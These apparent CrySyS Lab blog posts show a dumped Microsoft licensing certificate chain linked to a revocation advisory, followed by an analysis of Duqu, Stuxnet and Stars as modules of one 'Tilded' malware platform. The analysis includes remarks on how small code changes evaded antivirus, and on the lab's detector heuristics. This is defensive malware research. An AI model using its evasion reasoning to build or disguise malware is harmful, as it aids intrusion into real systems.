60:69:37:bb:4b:12:07:3c:56:ff:5b:fb:a4:66:0a:
08:a6:d2:81:56:57:ef:b6:3b:5e:16:81:77:04:da:
f6:be:ae:80:95:fe:b0:cd:7f:d6:a7:1a:72:5c:3c:
ca:bc:f0:08:a3:22:30:b3:06:85:c9:b3:20:77:13:
85:df
Exponent: 65537 (0x10001)
X509v3 extensions:
2.5.29.1:
0....[.p.ir.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft Corporation1!0...U....Microsoft Root Authority......<<...>.c..@
Signature Algorithm: md5WithRSAEncryption
95:e8:0b:c0:8d:f3:97:18:35:ed:b8:01:24:d8:77:11:f3:5c:
60:32:9f:9e:0b:cb:3e:05:91:88:8f:c9:3a:e6:21:f2:f0:57:
93:2c:b5:a0:47:c8:62:ef:fc:d7:cc:3b:3b:5a:a9:36:54:69:
fe:24:6d:3f:c9:cc:aa:de:05:7c:dd:31:8d:3d:9f:10:70:6a:
bb:fe:12:4f:18:69:c0:fc:d0:43:e3:11:5a:20:4f:ea:62:7b:
af:aa:19:c8:2b:37:25:2d:be:65:a1:12:8a:25:0f:63:a3:f7:
54:1c:f9:21:c9:d6:15:f3:52:ac:6e:43:32:07:fd:82:17:f8:
e5:67:6c:0d:51:f6:bd:f1:52:c7:bd:e7:c4:30:fc:20:31:09:
88:1d:95:29:1a:4d:d5:1d:02:a5:f1:80:e0:03:b4:5b:f4:b1:
dd:c8:57:ee:65:49:c7:52:54:b6:b4:03:28:12:ff:90:d6:f0:
08:8f:7e:b8:97:c5:ab:37:2c:e4:7a:e4:a8:77:e3:76:a0:00:
d0:6a:3f:c1:d2:36:8a:e0:41:12:a8:35:6a:1b:6a:db:35:e1:
d4:1c:04:e4:a8:45:04:c8:5a:33:38:6e:4d:1c:0d:62:b7:0a:
a2:8c:d3:d5:54:3f:46:cd:1c:55:a6:70:db:12:3a:87:93:75:
9f:a7:d2:a0

Next level (2):

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
3a:ab:11:de:e5:2f:1b:19:d0:56
Signature Algorithm: md5WithRSAEncryption
Issuer: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Validity
Not Before: Dec 10 01:55:35 2009 GMT
Not After : Oct 23 08:00:00 2016 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 1999 Microsoft Corp., CN=Microsoft Enforced Licensing Intermediate PCA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:fa:c9:3f:35:cb:b4:42:4c:19:a8:98:e2:f4:e6:
ca:c5:b2:ff:e9:29:25:63:9a:b7:eb:b9:28:2b:a7:
58:1f:05:df:d8:f8:cf:4a:f1:92:47:15:c0:b5:e0:
42:32:37:82:99:d6:4b:3a:5a:d6:7a:25:2a:9b:13:
8f:75:75:cb:9e:52:c6:65:ab:6a:0a:b5:7f:7f:20:
69:a4:59:04:2c:b7:b5:eb:7f:2c:0d:82:a8:3b:10:
d1:7f:a3:4e:39:e0:28:2c:39:f3:78:d4:84:77:36:
ba:68:0f:e8:5d:e5:52:e1:6c:e2:78:d6:d7:c6:b9:
dc:7b:08:44:ad:7d:72:ee:4a:f4:d6:5a:a8:59:63:
f4:a0:ee:f3:28:55:7d:2b:78:68:2e:79:b6:1d:e6:
af:69:8a:09:ba:39:88:b4:92:65:0d:12:17:09:ea:
2a:a4:b8:4a:8e:40:f3:74:de:a4:74:e5:08:5a:25:
cc:80:7a:76:2e:ee:ff:21:4e:b0:65:6c:64:50:5c:
ad:8f:c6:59:9b:07:3e:05:f8:e5:92:cb:d9:56:1d:
30:0f:72:f0:ac:a8:5d:43:41:ff:c9:fd:5e:fa:81:
cc:3b:dc:f0:fd:56:4c:21:7c:7f:5e:ed:73:30:3a:
3f:f2:e8:93:8b:d5:f3:cd:0e:27:14:49:67:94:ce:
b9:25
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Extended Key Usage:
Code Signing, 1.3.6.1.4.1.311.10.6.1, 1.3.6.1.4.1.311.10.6.2
2.5.29.1:
0....[.p.ir.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft Corporation1!0...U....Microsoft Root Authority......<<...>.c..@
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
6A:97:E0:C8:9F:F4:49:B4:89:24:B3:E3:D1:A8:22:86:AA:D4:94:43
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
Signature Algorithm: md5WithRSAEncryption
5d:2b:68:a5:e2:da:c7:2b:5c:77:ec:ea:0e:1f:e3:8e:41:57:
60:b4:8f:3f:a2:88:d2:0f:77:1a:92:9f:37:59:bb:15:97:dc:
a8:73:56:60:87:e3:3d:bc:b4:e1:10:64:2d:c8:b8:d6:81:00:
06:89:1f:96:41:ac:05:1a:ca:78:00:d9:db:5f:b6:f9:71:87:
8e:04:7b:fa:78:f2:1e:2f:df:8b:b3:04:fe:7a:cc:ef:af:5e:
98:da:1d:ad:94:95:74:b0:d9:87:97:58:1c:4f:a4:82:c7:f9:
b3:ae:09:06:12:7e:cb:fd:22:6a:94:99:4a:c3:b9:32:44:87:
bc:bf:f7:7c:60:6c:88:cc:c0:fd:b6:5c:14:19:71:31:5f:99:
d2:db:a7:0c:9d:c2:75:9d:ba:ed:b1:88:6c:52:1b:42:5a:2d:
b0:e3:13:04:78:ff:51:d7:58:e7:18:c0:01:8c:f8:43:12:a8:
9d:8c:b5:81:f3:70:a0:ad:19:c6:e4:e4:44:e5:55:05:50:d3:
88:40:65:aa:d0:02:0e:00:4d:84:bb:6a:39:0c:6d:88:f1:1e:
d6:95:72:34:70:9b:c5:a6:6f:66:bc:94:14:df:34:ff:e4:63:
3a:93:31:13:de:a0:2c:7a:73:68:7c:0e:44:98:a0:a8:37:3e:
2e:3a:5b:22

Level 3:

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
61:1a:02:b7:00:02:00:00:00:12
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 1999 Microsoft Corp., CN=Microsoft Enforced Licensing Intermediate PCA
Validity
Not Before: Dec 11 00:03:58 2009 GMT
Not After : Oct 23 08:00:00 2016 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 2003 Microsoft Corp., CN=Microsoft Enforced Licensing Registration Authority CA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:8e:98:07:ed:46:50:30:aa:8a:95:5e:36:7f:bc:
71:30:a1:1d:49:cf:e7:96:ff:2f:9a:09:16:12:f0:
98:31:55:45:52:40:63:7d:57:67:46:a2:2b:08:98:
6d:9b:c6:69:25:40:87:49:e7:01:37:84:00:1d:69:
9d:85:2f:e1:a0:2c:27:83:4c:75:60:8b:2c:eb:f9:
90:8e:5e:4a:8f:fd:d3:5b:8c:89:c8:0f:f8:cf:2e:
9f:3c:8a:3d:41:cc:b6:84:0c:9c:73:97:46:dd:52:
26:12:a5:44:8d:df:0a:50:1f:4a:79:dc:e3:19:3c:
ef:ed:82:c9:89:14:91:fd:99:69:a4:f2:8a:a6:c8:
8e:bd:38:3b:80:30:8a:59:c8:a0:ab:de:71:44:1b:
24:f9:b9:a1:8f:19:9d:fd:19:b4:69:16:17:a2:23:
31:a7:11:12:65:cd:c0:9d:78:5d:42:e5:95:8e:13:
2f:ac:f8:00:87:6e:96:ef:73:d4:0f:7e:3c:9f:81:
47:d0:1f:8f:79:1d:3c:3f:cb:ae:34:22:d6:cd:fc:
21:80:35:11:0d:a9:90:cc:55:b4:65:fc:2d:37:7d:
80:7a:97:ee:5b:4a:c5:3e:8b:03:aa:ae:4d:22:37:
66:70:84:1c:69:c5:d7:97:9a:8f:1e:3a:b2:24:84:
8f:ef
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
B4:A1:D8:DE:FB:0E:C4:CB:9D:9F:06:CF:36:0D:91:1A:F8:9F:5B:E3
X509v3 Key Usage:
Digital Signature, Non Repudiation, Certificate Sign, CRL Sign
1.3.6.1.4.1.311.21.1:
.....
1.3.6.1.4.1.311.21.2:
....x8g.).k/.T..p_....
1.3.6.1.4.1.311.20.2:
.
.S.u.b.C.A
X509v3 Authority Key Identifier:
keyid:6A:97:E0:C8:9F:F4:49:B4:89:24:B3:E3:D1:A8:22:86:AA:D4:94:43

        X509v3 CRL Distribution Points:
            Full Name:
              URI:http://crl.microsoft.com/pki/crl/products/MicEnfLicPCA_12-10-09.crl
        X509v3 Extended Key Usage:
            Code Signing, 1.3.6.1.4.1.311.10.6.2
        1.3.6.1.4.1.311.2.1.10: critical
            0....).'https://www.microsoft.com/repository/CPS........This certificate incorporates by reference, and its use is strictly

subject to, the Microsoft Certification Practice Statement (CPS)
version 2.0, available in the Microsoft repository at:
https://www.microsoft.com; by E-mail at CPS-requests@microsoft.com; or
by mail at Microsoft Corp, dept. CPS,1 Microsoft Way,Redmond, WA 98052
USA Copyright (c)1999 Microsoft Corp. All Rights Reserved. CERTAIN
WARRANTIES DISCLAIMED AND LIABILITY LIMITED.

WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, AND WILL NOT
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
THE CPS FOR DETAILS.

Contents of the Microsoft registered nonverifiedSubjectAttributes
extension value shall not be considered as accurate information
validated by the IA.
.6.4https://www.microsoft.com/repository/mscpslogo.gif
Signature Algorithm: md5WithRSAEncryption
24:ab:ed:f7:72:44:44:98:71:f6:d1:b9:b5:69:e0:ef:1c:b0:
4c:04:98:0f:bf:4c:a9:74:47:b0:84:a1:48:e2:81:b3:ea:e1:
c9:53:92:53:11:c8:45:ba:88:76:68:cd:dc:be:f3:a0:65:80:
76:d7:93:03:69:8d:c7:bc:7a:ae:89:7c:df:12:10:0a:a6:29:
a6:d4:e5:9b:55:ab:ca:ec:4b:d9:c1:28:37:d0:d6:71:38:6d:
5e:75:fd:66:ab:2a:c0:b9:24:6f:9e:42:33:0f:71:b4:6e:a6:
f7:ba:23:1a:74:ed:cd:b1:ae:0a:32:a8:5c:26:16:fa:31:76:
23:e8:a7:24:80:f1:de:45:b5:42:bd:f1:58:08:8f:e2:f2:70:
86:2e:13:83:24:de:50:88:88:c0:23:32:59:74:fa:7a:5f:73:
d7:63:bd:58:9d:c0:68:b0:53:21:71:50:45:b8:27:cf:3c:e5:
64:fb:7c:13:8b:c1:01:3e:90:d9:43:f7:3e:cc:19:16:b3:b6:
16:8f:27:7a:f9:46:ed:8a:da:e7:c5:91:c2:c8:2a:08:21:5a:
b8:7a:88:4e:a6:2a:a5:f7:ed:20:01:14:48:56:df:57:7d:6f:
bf:95:75:18:29:17:19:84:a3:13:61:54:82:c3:55:58:3d:83:
a3:90:75:aa

Level 4:

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
61:03:73:c5:00:01:00:00:00:1a
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 2003 Microsoft Corp., CN=Microsoft Enforced Licensing Registration Authority CA
Validity
Not Before: Feb 19 21:48:39 2010 GMT
Not After : Feb 19 21:48:39 2012 GMT
Subject: DC=com, DC=microsoft, DC=extranet, DC=partners, CN=Microsoft LSRA PA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:d7:27:32:63:50:bc:ca:67:6c:44:c2:08:0a:fb:
aa:e8:25:ff:e5:a8:f3:32:53:0b:53:af:b7:29:cc:
2c:91:34:01:f1:52:59:55:73:df:56:2c:25:ae:41:
d1:2a:de:09:d1:90:41:bf:2c:c7:6d:e6:1b:0d:5c:
1f:c4:62:06:1f:72:6a:fc:a6:d7:19:57:c1:06:42:
35:50:78:ec:6d:a2:13:b0:90:9d:0c:9d:d8:5f:b7:
bf:f0:cc:b1:a9:b8:c1:f7:b9:a9:e3:14:c6:9a:bb:
6a:8c:c8:6f:bb:c4:e6:3b:de:c3:16:25:cf:76:d4:
7c:e5:88:80:e9:4e:27:6d:b9:c6:fb:a6:6e:b0:65:
15:e3:4d:b3:1b:e9:ac:fa:87:37:8a:e9:81:d1:4e:
49:26:b8:26:72:3d:bf:cc:cb:d3:9c:55:cf:a9:2b:
4b:22:78:44:85:0b:04:ee:09:84:bb:65:c4:31:8a:
83:3b:fa:53:98:a1:fd:a1:f4:4c:71:4c:e9:15:87:
2b:13:ef:dc:d6:52:84:ed:1c:e5:35:4a:22:2c:14:
84:6b:f2:8a:ef:9b:f6:d3:75:ce:6d:0e:81:1f:6d:
df:22:ee:b3:ec:01:36:d8:ff:68:ff:4e:ba:75:d5:
4e:18:e6:b4:00:7e:b9:a3:ee:31:2e:4e:a0:0c:e5:
21:eb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:TRUE, pathlen:0
X509v3 Subject Key Identifier:
75:E8:03:58:5D:FB:65:E4:D9:A6:AC:17:B6:03:7E:47:AD:2E:81:AF
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
1.3.6.1.4.1.311.21.1:
...
1.3.6.1.4.1.311.20.2:
.
.S.u.b.C.A
X509v3 Authority Key Identifier:
keyid:B4:A1:D8:DE:FB:0E:C4:CB:9D:9F:06:CF:36:0D:91:1A:F8:9F:5B:E3

        X509v3 CRL Distribution Points:
            Full Name:
              URI:http://crl.microsoft.com/pki/crl/products/MicEnfLicRegAutCA_2009-12-10.crl
              URI:http://www.microsoft.com/pki/crl/products/MicEnfLicRegAutCA_2009-12-10.crl
        Authority Information Access:
            CA Issuers - URI:http://www.microsoft.com/pki/certs/MicEnfLicRegAutCA_2009-12-10.crt
Signature Algorithm: md5WithRSAEncryption
     5c:b5:59:bb:13:8c:dc:55:00:48:24:53:8d:fe:09:69:eb:8e:
     5e:f9:79:6d:92:33:7a:f2:29:7f:61:1d:c7:fe:4c:f0:1b:5a:
     ad:ff:6c:36:bc:20:0a:03:31:6a:6e:a0:ac:6b:27:c8:99:9c:
     5d:29:80:a5:c0:61:42:2f:b5:0a:f3:2e:69:b3:6f:3e:64:e1:
     33:5b:03:7b:f1:b7:c9:24:a0:40:91:29:22:07:52:1b:52:39:
     b7:49:c8:16:f9:e2:e4:54:a7:67:47:64:86:fc:c6:cf:32:b9:
     91:49:30:66:0e:9f:a6:d7:6c:e0:48:7e:11:65:42:48:fb:0e:
     09:09:3a:aa:48:e6:ee:5c:0c:51:40:58:19:8b:4c:26:92:ee:
     c8:55:93:40:20:91:d4:dc:33:dd:d2:e6:1c:12:d6:72:bb:c0:
     ad:53:2f:f8:99:43:11:4a:6c:dc:a1:f4:0c:5a:21:b5:05:ea:
     ac:e8:50:1f:29:04:c9:81:c7:8e:95:2c:7c:72:4f:78:e9:c5:
     4c:c4:8e:c8:db:ee:09:10:7b:5b:38:c9:b3:b9:18:ad:87:f6:
     1b:98:25:da:1a:56:61:76:c9:12:7c:98:1a:06:f0:a0:86:38:
     6a:25:0f:5d:b9:1f:7f:c0:85:6a:aa:69:fb:23:91:ca:41:8a:
     0c:19:44:5c

And the final step:

Certificate:
Data:
Version: 3 (0x2)
Serial Number: 7038 (0x1b7e)
Signature Algorithm: md5WithRSAEncryption
Issuer: DC=com, DC=microsoft, DC=extranet, DC=partners, CN=Microsoft LSRA PA
Validity
Not Before: Feb 19 21:48:39 2010 GMT
Not After : Feb 19 21:48:39 2012 GMT
Subject: CN=MS
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a6:89:43:6f:c6:ca:9d:42:ad:bd:28:d5:46:49:
e0:55:f2:cc:38:e0:3d:c0:7c:ba:1d:ca:bb:92:c4:
be:4c:5f:1a:f9:d6:42:4b:34:0b:2f:8a:ac:cb:97:
31:ef:76:2f:c3:85:af:95:93:47:46:f6:ff:7c:ca:
df:c8:f9:d0:6a:ec:df:0e:91:55:23:ab:64:06:90:
d3:37:83:a8:0e:3e:5e:7f:77:35:66:74:20:87:42:
1f:25:17:8a:d5:28:05:38:05:c8:48:6d:63:76:3e:
fd:5a:11:67:07:09:6d:98:a3:08:4a:f1:11:7f:80:
a7:4e:37:d4:f0:0e:34:7a:d5:ba:83:ad:60:1e:57:
44:65:50:72:cd:af:1e:d0:1e:30:c2:eb:6a:51:e2:
aa:54:85:57:fa:9c:b1:59:e8:24:5e:d4:38:d3:56:
81:68:d5:05:8b:48:25:92:a2:11:1b:e8:51:54:d9:
d9:04:60:ee:1c:fb:6a:ec:f0:6e:38:bb:ad:da:35:
87:63:74:86:ef:1f:cd:80:92:a2:98:3a:97:9a:bd:
35:d1:7d:2e:3a:47:04:48:17:74:db:a3:67:d9:82:
78:e0:77:2c:cc:ac:39:61:a6:d8:9d:aa:fc:de:6f:
60:4c:7c:73:07:31:93:2f:67:28:4a:7e:d1:ae:4c:
42:dd
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
00:4a:ab:73:72:83:71:31:a8:04:a4:d5:27:cf:cc:5a:ca:76:
ca:67:4c:05:58:4b:b7:07:e8:94:04:86:a5:10:00:50:34:a1:
71:fe:5d:fd:9b:4b:29:7f:5c:ca:52:c7:8b:c0:7d:49:c9:8b:
23:e1:5d:f3:8a:c3:25:ab:48:07:3f:f5:f4:ef:77:dc:46:d2:
b2:97:0b:c9:7e:bb:af:29:5f:ec:de:40:2b:e8:bb:e5:12:b5:
f7:4d:71:7b:94:35:50:57:e8:fb:ee:67:f3:85:db:ed:d6:64:
78:f1:7c:71:70:75:02:17:68:66:49:bb:29:5c:e5:f2:4a:e3:
ca:dc:8c:f6:6d:62:9c:d0:5f:e6:3e:b1:e1:e5:cd:87:1d:7e:
97:e2:d8:4e:11:7b:8a:4b:56:79:9d:fb:04:ff:80:ca:01:af:
36:ac:c8:20:0e:d7:49:14:10:4f:e7:3c:64:ac:30:dd:d1:4c:
5c:35:ef:16:bf:6f:74:bb:19:fd:26:24:b1:12:c5:05:44:a9:
1f:42:6b:1f:96:0d:c9:4a:38:b5:00:8d:b3:64:fa:68:fe:d1:
aa:ce:8c:f7:20:50:d1:17:70:b3:90:85:7f:72:48:c2:d3:03:
c3:e7:bc:f4:0f:63:01:a0:71:b7:a7:ec:d6:b9:48:17:dd:a1:
43:a2:b9:96

So from http://technet.microsoft.com/en-us/security/advisory/2718704 Advisory we know
that

  • Microsoft Enforced Licensing Intermediate PCA (2 certificates)
  • Microsoft Enforced Licensing Registration Authority CA (SHA1)

were revoked.

The exact list can be found at http://blogs.technet.com/b/srd/ as follows:

Certificate Issued by Thumbprint
Microsoft Enforced Licensing Intermediate PCA Microsoft Root Authority 2a 83 e9 02 05 91 a5 5f c6 dd ad 3f b1 02 79 4c 52 b2 4e 70
Microsoft Enforced Licensing Intermediate PCA Microsoft Root Authority 3a 85 00 44 d8 a1 95 cd 40 1a 68 0c 01 2c b0 a3 b5 f8 dc 08
Microsoft Enforced Licensing Registration Authority CA (SHA1) Microsoft Root Certificate Authority fa 66 60 a9 4a b4 5f 6a 88 c0 d7 87 4d 89 a8 63 d7 4d ee 97

For the certificate chain above, Level 2 certificate is the certificate referred in the latter table in row number 1. The other two certificates might have been revoked for precaution.
level 3.

Posted on 2 Comments

Duqu=Stuxnet=Stars=Tilded and it is a lego-kit

Let me answer to Takashi Toyota here. Maybe this blogpost will be corrected/edited later without notice.

The question was:

@CrySySLab @mikko Thank you for the info. “They” have dev platform called #tilded, dont they? From there many instances comming out!

In fact, this is an answer to our tweets “Duqu=Stars=Stuxnet (= #tilded) Duqu is an info stealing instance, Stuxnet is a PLC modifying, self-replicating instance.” and “Don’t think on Duqu as a traditional malware. It’s just a version of a info stealing instance of the #tilded platform.”

So the short answer is yes: Tilded-Duqu-Stuxnet-Stars is a development platform for making the right individual malware instance to the actual duty and the actual target.

For the  second part the answer is: It depends on the industry if “many instances will come out”. Our CrySyS Duqu detector is the tool that is the first step to stop the threat at all and as such it is a groundbreaking (tilded-breaking) tool. However, this is just a first step, not a final solution!

Let me explain.

  1. Why is Duqu=Stuxnet?

When we started our investigations we saw raw binary code and had only partial, local information. In the recent months we were discussing a lot and read many interesting news, and the most interesting pieces were coming from Symantec and Kaspersky (and others as well). When we published our report, we were not sure what is the real target or if the code is surely based on source code of the Stuxnet. Now we are confident that the goals of Duqu are most likely highly related to Stuxnet’s goals and that most likely the same developers are behind the code.

Moreover, we really believe that actually Duqu is not a separated project from the Stuxnet/Tilde/Duqu/Stars team, but an integrated part of a workflow. And this workflow does not produce strains or pieces of malware, but they produce modules and compile “instances” for a particular target and a particular goal.

They have kernel drivers, they have exploits, keyloggers and infostealers as (~DN1), file packers as Stars, PLC modules as for Stuxnet, RPC module, injectors, rootkit stuff, and maybe a lots of other modules. Most of them are easy to modify, or to parametrize, and easy to cooperate (compile in, download, etc.) with other modules.

As such, yes, it is a platform. It is not a development platform as it is not an API, but a bunch of modules in different versions and modifications. Most likely, it is not based on a versioning tool, such as SVN where you just checkout the latest version, it is more about the target, the goals and the ideas. Maybe some times they divert to an old version as ‘oh, in that case that idea/modification was great and it’s fit to the current target’ and such.

So we fully agree now, Duqu is not and individual malware, but part of a long story, and we also proposed not to call the individual parts (Stuxnet, Duqu, Stars – SDS), rather we should name the platform somehow. Maybe tilded is the right word, maybe not, but calling them by individual names can be misleading

  1. War of definitions and names

Duqu was called a RAT, Remote Access Torjan. However, it is not a trojan as it does not state that it will do something good. It is installed through a 0-day windows exploit, so I would not call it a trojan. It is not a virus as well. It does not self-replicate, so still, malware is the best word.

Moreover, it contains a rootkit, as it loads a driver during windows startup. But it’s goal is not a backdoor, or it is not the only goal. That’s true, but it does not infect computers all the time, it can run it’s info stealing component on some targets without infection. Then again – is Duqu a simple keylogger/infostealer? No, it’s more.

Then Duqu is not a rootkit, the rootkit part is just some tool. The info stealing component is not active all the time, moreover, it is not even included into all the Duqu infections at the first step, it is just downloaded from the C&C servers. Okay, then Duqu  is a malicious communication protocol? No, it can be, but it’s possible to use RPC to communicate with others without direct communication to the C&C server.

Why was it so important to discuss about this? To see that  Duqu at whole cannot be put in any normal categories of malware. And the reason behind this is that “Duqu at whole” simply does not exists! It is a lego-kit of modules and You can only define the goal of the individual modules, not the kit at whole.

(So we totally agree with the definition of Duqu (Tilded) to be a lego-kit recently said by Kaspersky, we already used the verb in our short 5 minutes presentation in November at the Cyber-Security conference at ZMNE, Budapest).

  1. Why additional instances won’t come out in the near future?

When we identified that Duqu is so closely related to Stuxnet, the most basic question was: Why antivirus tools failed to identify Duqu? You can extend the questin: How is it possible that no one identified Stuxnet and Duqu for such a long time. How is it possible that so many different types existed and they recognize them only recently?

We want to work on this topic, but some preliminary remarks:

-There is a reason why the code of the parts of “Tilded” are so close to each other. Efficiency. Not to rewrite everything multiple times. And more interesting: “Tilded” is a special malware as the code is tested thoroughly and contains lot of careful error handling. Do you want to completly rewrite a code? The you  have to restart testing procedures as well. Nobody likes to waste time, therefore basics remained the same for all the code produced by the team, if possible.

Simple changes were necessary and enough to avoid identification of new instances by Anti virus products, and these small changes (e.g. crypto code) were easy to test.

So why do we say that it is unlikely that the team will come out with new instances in the near future? Because if they do not change basic characteristics, these new version will be vulnerable to detections by tools such as our Duqu Detector Toolkit (will be later renamed to something more general).

We made our detector toolkit based on the basics how the Tilded/Duqu/Stuxnet tools work. Our tool does not only detect the driver by signature based techniques, but it detects the info stealer temporary files, any PNF files in the windows/inf directory which has more entropy than expected, etc.

All-in-all our Duqu detector toolkit makes it possible to detect ALL different version of the Tilded platform (Duqu, Stuxnet, who knows what) at some extent. I would not say that it will detect all the possible pieces of information, files or registry settings, but most likely our tool is able to pinpoint problems in a network weather it be 10 computers or 10.000. Again, not just Duqu, not just Stuxnet, but any intermediate instance might have signs that the detector might identify.

And it’s not just our tool. Several researchers made new tools that are not based on raw signatures, but some kind of heuristics. Check Bro, check Metasploit, check A/V vendors’ tools, and others, you can not even easily collect all the ways how people now check anomalies of the platform.

This is the reason why simple modifications on the malware platform now does not work. They need a complete re-write of the code to avoid rapid identification, or the story vanishes in time. Who knows what will come.

I should again thank for the collaboration to Kaspersky and Symantec on the topic.

  • Boldi

Editorial note

Blog entries of the Lab is a rapid way of communications. Entries have not went through the regular quality check processes and might contain errors. We modify blog entries if necessary without prior notice. The blog post is a personal disclosure and does not reflect institutional opinion.